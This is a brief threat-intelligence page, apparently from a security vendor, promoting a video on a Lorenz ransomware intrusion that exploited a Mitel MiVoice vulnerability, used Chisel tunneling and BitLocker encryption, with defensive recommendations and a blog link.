Lorenz Ransomware Intrusion: Understanding Your Risk

Lorenz Ransomware Intrusion: Understanding Your Risk

The Arctic Wolf Labs team recently investigated a Lorenz ransomware intrusion, which leveraged a Mitel MiVoice VOIP appliance vulnerability (CVE-2022-29499) for initial access and Microsoft’s BitLocker Drive Encryption for data encryption.

Lorenz is a ransomware group that has been active since at least February 2021 and like many ransomware groups, performs double-extortion by exfiltrating data before encrypting systems. Over the last quarter, the group has primarily targeted small and medium businesses (SMBs) located in the United States, with outliers in China and Mexico.

In this video we cover:

  • Background on the Lorenz ransomware group
  • How Lorenz ransomware group exploited CVE-2022-29499 to compromise Mitel MiVoice Connect to gain initial access
  • How Chisel tunneling was used to pivot into the environment
  • Arctic Wolf’s recommendations to decrease the attack surface of your organization against the TTPs

For more on Lorenz, visit: https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/